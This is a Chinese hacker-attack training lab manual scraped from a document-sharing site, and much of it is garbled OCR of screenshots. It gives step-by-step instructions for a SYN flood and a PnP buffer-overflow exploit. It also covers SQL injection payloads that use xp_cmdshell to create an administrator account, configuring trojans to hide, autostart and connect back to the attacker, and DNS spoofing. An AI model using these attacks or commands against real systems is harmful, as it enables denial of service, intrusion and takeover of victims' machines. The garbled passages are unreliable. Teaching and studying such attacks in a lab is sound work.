


版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、技术人员培训实验手册- 黑客攻击课程实验目录实验预备工具 31 VMWare 使用 32 EtherPeek NX 的使用 3黑客攻防实验 51X-Scan 扫描工具应用实验 52Synflood 拒绝效劳实验 63 缓冲区溢出实验 74 灰鸽子木马实验 95 反向连接木马实验 136 蠕虫扫描实验 147 SQL 注入攻击 158 欺骗攻击实验 16实验预备工具1 VMWare 使用1选择关闭虚拟机电源,选择将虚拟机挂起,选择启动虚拟机。UJ越斗対1| Jll砂和T»MFT揺二J老晦晤为 i=;2点击,虚拟机进入全屏状态,按住Ctrl+Alt退出全屏。2 EtherPeek NX
2、的使用p1® BthMiP wki MC - SlMirl1按new capture,新建一个捕包任务。I 口匕 C.dt 兰Wi1日 Sfl-nJ lEtb塑neb?* t>ilpm 凹国工l戲 曹鸟 Lr s o mGet Started-ICaptureOpen capture ifilc On AEZ20O7ia c£ 20s hl aiJWOO?角m! HiJpiO 口 wsctn13 OB Chip nt 孑:«2414TdiwI M二Il' J ri i.i ! ii 'h>*. !.!- n p t"
3、7;- i-f2配置任务的属性。选择的网卡为欲捕获数据包的网口。3点击Start Capture,开始捕获数据包。通过选择不同的选项卡,从不同角度查看捕获的数据包。(1)在windows系统上运行X-Scan。黑客攻防实验1 X-Scan扫描工具应用实验实验环境:操作系统:windows 2000/xp ;实验工具:实验步骤:(2) 设定扫描参数't- ixK-. : li-T - 3 工 松豪俅 ;HluIme NTJAAayKrvaO、国龙上可氓疔二BTT手列庐电.罗扳74*3' ?于帝*ont .d上的:!:*Fb + hYM:.EJy 召丄电=.r 乙 * - 吐釉間m
4、; rua m Rfclhu mr a »a« , invu.ibavlwil 41(3) 运行扫描点击丄开始运行扫描匚尸冈玄畔f7'世極on 舌*血 i#aj snsv普:*催处1B2 IDS. 1 gi號 iMii.eIM 1 3药.和tb悄i 摘 性翅.洁齡程.宝ma宣】睡 MB. t £工4I正隹检JdItT«F*<rl!»? J4Q ( 2SEI TT46Jrwr-5«trv*rii19-Z Jan L.lS3ZT3.1 i-iT If?I 2妙"3玉丄在*一匸|£眩 M 眩 Az.2 .-
5、.- z S=1至2 E TJ EU"lJ c-l_irr Tw.««白 d £ 2 日 3_1r 芒 * i «1 .X ! . - 11 -nnrBLr raL实验结果:扫描结束后,得出扫描报告。可查看被扫描主机存在的漏洞信息。2 Synflood拒绝效劳实验实验环境:操作系统:wi ndows 2000 server 虚拟机,wi ndows 2000/xp 实验工具:syn flood实验环境示意图:实验步骤:1在windows 2000 server虚拟机系统上运行 Synflood。 synflood 不可运行在windows XP
6、系统运行cmd,定位synflood 路径,本例中synflood 存放在C盘根目录下, 因此格式为:C:> c:synflood.exe <攻击目的IP>2在被攻击主机上运行EtherPeek,抓包的表现如下:运行结果:虚拟多个IP主机攻击目标主机,致使目标主机资源耗尽。3 缓冲区溢出实验实验环境:操作系统:windows 2000 server虚拟机被攻击方主机,windows 2000攻击方主机实验工具:X-Scan , pnpscan , pnp exp,远程桌面工具实验环境示意图:实验步骤:1确定攻击目标。在攻击方主机上运行X-Scan扫描目标主机上是否开放 445
7、, 139,3389 端口。-in|x|玄恤 iftfirw) hqo工凤也w»x:)划ni cjiw八礴13S/tciLK/ta44 r f! terIK'S/I J-JitDS7/lcpM3Mf 址 p'HTKIDS乱曲也乱rriTR务承同5«-:星囂杲昂執舟&風>oHrF-ilfnz.rflV诈Hr:Mtc.hf.TrtrJ(JlJl.:/l肌取。打.|1幵fFtntJIMK幵I;&ren, Pml Dffic. ProtcM-ulD.El.s.B.B.B.B.EB.B.B.l-f-H.B.r k 6 6- 6 b h k:h &
8、amp; 6 6- c h- 6 -n i s i ij 2於 g izsJ>r -J R -y *y $ 9 MV nM M $ fl o .v u 匚 g 卜 L lA ,- .3 -n L L-Lrrr L LLtL FltTLTG >翅Ll. iL+ 君iSB i.E2 a卑.4住庖14杵討i曰|菇曰少担 当勺此应. j:.山血笑削出皿| i nfEejEiwmijm host dtmd 1J J?匸jhBtjIM險邛ut tfread SjtDX nr-c(5jJ -扌2利用pnpscan扫描目标主机的 445或139端口是否存在漏洞。3用pnp_exp进行缓冲区溢出攻击
9、,注意要在绑定IP中输入攻击主机的IP,绑定端口可输入一些常规端口,例如:80,8080,21等来迷惑目标主机的用户。4溢出完毕后,在攻击主机上可以看到已进入目标系统。5在命令行提示符下添加管理员账号,命令如下:net user admin 123 /add 加用户 添加的用户名是 admin密码是123net localgroup adm ini strators adm in /add 力口组6启动远程桌面工具,利用添加的用户,进入目标主机攻击结果:获得目标主机超级管理员的权限。4灰鸽子木马实验实验工具:操作系统:windows 2000 server 虚拟机被攻击方,windows xp
10、/2000 攻击方实验工具:灰鸽子实验环境示意图:实验步骤:1配置效劳器端在攻击方翻开灰鸽子客户端。翻开配置程序配置效劳器端安装路径和安装名称可以修改,以到达迷惑被攻击主机用户的目的。选择运行后删除安装文件到达隐藏自身的目的。设置开机自动加载方式和关联文件I丄一苗电JI I竺靈塹細设定捆绑文件,即在被攻击主机上运行效劳器端,用户看到的是绑定的文件内容。选中待配置的效劳器文件为灰鸽子自带的Kernel32 。效劳器端程序配置成功。TTW 00000 no oo ooi oo JO oo00DO D 00 000000* -H乌Winrfgf盼習耳器瞬歡7CP I 评用:0% |A$W; 6B60
11、VK /233732K实验结果:客户端连接效劳器端,连接成功后,就可以控制被攻击主机。在目标机上运行 Kernel32,翻开资源管理器可以看到Kernel32的进程。应月毘库出瞳性屋 |2木马植入将生成的效劳器端程序植入被攻击系统。兀件日±in(Li荃馳 帮顷也3凶君土hji gj .竝止 0DIZPI 001建更进巻W.srooLsy. eie m E<ltc axellssrv #» emd buTeg-5VC FTRnzla.K, t2Lei£ssvc cxe tMplcrtr. baand« exe個比弼Q oterai.r = "
12、; -= =一 , b-xaUU BT间 0 co co0:00:000.C0JBora- o:oo: U.UJ.C5EA7JG9C772ooc1052iuyt 11L 2H3Z1135 屹g3/TBCI5J0fi £ 15C 2JM 輕80S 3,O7£ 巳昭 % IM 1,320 4/1B-4 xn立gjf绪严时TE也屮Rd ; * " *爭Hl) : 1 钟:1hit 1 I、汇趴牡:6*-止.:-:.丈岸F 曼旦日葦曲|H;| 丈帕 MKiXAli 電舸巴口匕翻3亦1卫话lr*flpA P*oflTG Fte+韶It的孕Eil -国皿6 -理f 応适_jI
13、 "SJj戈|其 CT0十和*+ Be rivinti uidl 3二实百 faP.I>« bhJOT5-3E-3O LA X± _| 口*:2M-i£aa w <3E 2j gpJjEatinh如哙® L2昭2j扣卜卩也i 斗:|斤 5 M Fil"!.301<-33 14 B亠1 Sysi wIiKl?-E-» 13 IT_|*IHHI!2M£*2O 15 晳 dl% it!.LSKflSMXPM 12 «2 WCI-"Jp #w邨LEI£13/1 畑IK L2
14、CBpXJTMXX MJQ53?-Z-3J IE 肝国 beol i du2W1A3J t2 39a|ka-s.tg'BeLi Wa切imL2 ®刮UBH#亦Daoifi-ir-aa 直 幅2 SISCw-ira> 12 叩国整口匹ST:02J:mH LS 换*JJfTnmcT enui££ d -CS- Qt- lE <3&首 rtt?在:匚.5反向连接木马实验实验环境:操作系统:windows 2000 server 虚拟机被攻击方,windows xp/2000 攻击方 实验工具:tequila ban dita(tb)实验环境示
15、意图:厂 Inject (FWE+)ExplorerC Browser17 Melt硬 ActiveX Startup r EnaNe Key Spy 回 Wait Until Online7 Compress (UPX)实验步骤:(1)翻开tequila bandita tb丨木马客户端,选择菜单项选择项-生成效劳器端。注意IP地址栏填写攻击方的IP。端口可以填入一些常规端口,如80,8080, 21等迷惑被攻击方用户。Create ServerMain Settys 艸需泪庐冃饰IP:E汪:|w inho5t32.exe: ActiveX Key(2)连接效劳器端成功后,在客户端如下显示:
16、实验结果:控制目标主机。沽g LT Fl 恥TT ILtJi:坯:須JU 田MW"-|C| xIP|用戶:丨连接:1 強.1 曲.£VEJLSIRAIN - A. LWJWin2k6蠕虫扫描实验实验环境:操作系统:wi ndows 2000 server实验工具:n map实验步骤: 用nmap模拟蠕虫的扫描过程,本例中以扫描445端口为例。命令如下:nmap路径-sP - 注:使用 -sP"命令,进行ping扫描,PT"选项可以对网络上指定端口进行扫描Host TEST ClZ划?appears to be udHiirtp run 25& I
17、P dddnfvcvt <3 InieLv up> ginwd Li 1? i£«cundlvhsxlinciimcnts nnd Setti rsXl FSMJI ;甲怪人鬼琨、势詰村科甘1插器.阳町“吋卩亦卜尸 一FT呷专勺 172.1&B.1_HZ24ICF pjbe ipuirt 44!?RmrEin nenp U« 2111129 < iahj G in<4>eHikr« xnrg/nm)> >11 npLfalc- fe if iiiifl niivinpacrvicri? Rrna-Tf i
18、n qt t* Z< /a fi-rv ic<npAlirtlhKi Ciruld. not det: om in uJuit int Brf acv tu route pAceC: e 右Iifoli;牙i to 192 - 166 iQ> cltangLny pln CcunCs/ps to ICtfF onlyhenrtCG in! s&ndplnisiqueiy Ef r>畝 al («houl4 he S>ttfinrlt»£ Hn auichi file dJireEtoi*)i卜輕nilte in kirnvlp
19、ingiifreturnipd -1<hinlIwb A5?1 卵dg; Hq 年mJi fil$ or* d!l¥£tOF<*iH ost I EM-9 3 A6 5981F1 fi <192.165.1 £ ppsaii*s ta he up.Host OHULi lHfl lN (11I2 .1I&B4ppcw3 to he up,Hu&l TES1Afljeat-X tn Lierun coni»lotad 256 IP addrooiso <3 M«ts u> canhod in 3S B
20、BCDindlGb : Xllhicume111. £ mid S>e t L ijigs: Xl BM >s出现Host *IP地址appears to be up. 代表*主机此端口翻开。实验结果:捕包结果如下:7 SQL注入攻击实验环境:操作系统:wi ndows 2000 server实验工具:无实验环境示意图:虚拟机被攻击方,windows xp/2000攻击方实验步骤:1准备条件把 IE 菜单 =>工具 =>Internet选项 => 高级 =>显示友好错误信息前面的勾去掉。否那么,不管效劳器返回什么错误, IE 都只显示为 500 效
21、劳器错误,不能获得 更多的提示信息。2判断能否可以进行SQL注入可利用以下测试方法测试: :/showdetail.asp?id=49 :/showdetail.asp?id=49 and 1=1 :/showdetail.asp?id=49 and 1=2 这就是经典的 1=1、1=2测试法了,可以注入的表现: 正常显示 正常显示,内容根本与相同 提示BOF或EOF程序没做任何判断时、或提示找不到记录判断了rs.eof时、或显示内容为空程序加了 on error resume next 3判断数据库类型及注入方法 分别在地址栏中输入以下网址探测::/showdetail.asp?id=49
22、and (select count(*) from sysobjects)>0 :/showdetail.asp?id=49 and (select count(*) from msysobjects)>0 如果数据库是SQLServer,第一个网址的页面与原页面 :/showdetail.asp?id=49大致相同;而第二个网址会提示出错,就算程序有容错处理,页面也与原页面完全不同。如果数据库用的是 Access ,第一个网址的页面与原页面完全不同;第二个网址 与原网址也是完全不同。 大多数情况下, 用第一个网址就可以得知系统所用的数据库类 型,第二个网址只作为开启 IIS 错误
23、提示时的验证。(4) 利用系统表注入 SQLServer 数据库 用net命令新建了用户名为 name密码为password的windows的帐号:/Site/url.asp?id=1;execmaster.xp_cmdshell“ net user namepassword /add - 将新建的帐号name参加管理员组:/Site/url.asp?id=1;exec master.xp_cmdshell“net localgroup nameadministrators /add -这种方法只适用于用 sa 连接数据库的情况, 否那么,是没有权限调用 xp_cmdshell 的。实验结果:
24、获得被攻击系统超级权限。8 欺骗攻击实验实验环境操作系统: Windows 2000 虚拟机攻击方主机 , windows xp/2000 被攻击方主机 实验工具: EtherPeek NX (抓包工具 ), Cain&Abel ( 黑客工具 )实验环境示意图:实验步骤1翻开 EtherPeek NX 选择 New Capture,选择 capture->capture options,设置 filter 的 条件。丫凶Captuirc OptionsG«nar oJ.九也.pt. ar |Xcicc>ptTari gark Fil ters 5 tiati Et
25、a. qe OutputBTtly packa ts in at chi ng at 1 aavt oneriiis iUUD 口口N6PApplTMk h日P pftckvt?reninskin曰i口玉卩时k*Nh=4vvre:NHVre pacl曰宫MuflioM Phyoioftl rnutioaot pa0*SI: OGI »ackctv1 l 匚np/ of IPIP. 口|M玉 pACkPt4?口 DECnet=DFCrist psck&ls口 DHCP;DHCP packets:S DhISTiSi也品皿巨jb-ICI-binor pRckets口 FTPJ 卜
26、 TP dsrla or cortrol jackets 1口 HTTPHTTP 叱!<呂口 KW1 IPIBP.DNUMMcIn AppteTIK_ AtpIcTflIK AupIcTsik 口io勺日gotPoGkcts to liCjApiolcTalk b庆Dsdu帝融Physical I吕、吕f trcrsictiats婀址 _IL郦自I 帮肋 I2双击DNS编辑过滤条件,即协议类型是DNS,地址是 192.1682210。3在被攻击主机上测试pingsohu,抓包表现如下:F ! EdA 些CatuEH 's-ard Mbnikn- LdcJh g'indCT
27、M一 | 占&C |琴画型 4 A 鼻-厂玉3 口* *!>亡I TlffrieFi>-r!VT1EtlFmMID 3SO6bt血SiH0 33:35NiC-JMg讯弊a疔1幻也0吓.10:3(:01 -(fi". Xiin rCliw专囂4翻开虚拟机,启动Cain,选中sniffer,点击运行sniffer,扫描本网段内的主机。双击一条记录,可以看到目的DNS效劳器的 MAC地址。本例中显示的是被攻击主机的DNS效劳器的 MAC 地址为 00 OE 0C 69 F5 79。" LtibcrPeck hx - LuptuPE £ Pocket |«1-IQI2SJ£ tlr 當昶 上讣 口1趙 HnU Qsitw Lwb-口占5选择 Sniffer 选项,ARP >DNS6选择 Add to list, DNS Name Requested 填入 response packets 填入venustech。当被攻击主机访问venu stechvenu stechsohu,IP add
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2025烧烤店用工合同模板
- 2025【出国劳务合同范本】出国劳务合同样本
- 2025年版中外合资合同范本
- 2025瑜伽班转让合同
- 2025供应商合同管理程序模板(标准版)
- 2025建筑工地材料供应合同模板
- 2025签订购房合同的重点注意事项
- 2025企业终止员工劳动合同模板
- 热工专业考试题库及答案
- 2025年大众传播学试题及答案
- 2025秋教科版科学二年级上册教学课件:第一单元第3课 家里的物品
- 单位打车管理办法
- 市级防汛物资管理办法
- 试油操作规程详解
- 婚姻家庭调解课件
- Mg2Sn基多层薄膜的层界面调控与热电性能
- 2025年英语四级考试真题试卷及答案
- 2025年心理辅导员职业资格考试试卷及答案
- 医院法律法规培训内容
- 科技创新管理办法细则
- 飞书使用教程培训
评论
0/150
提交评论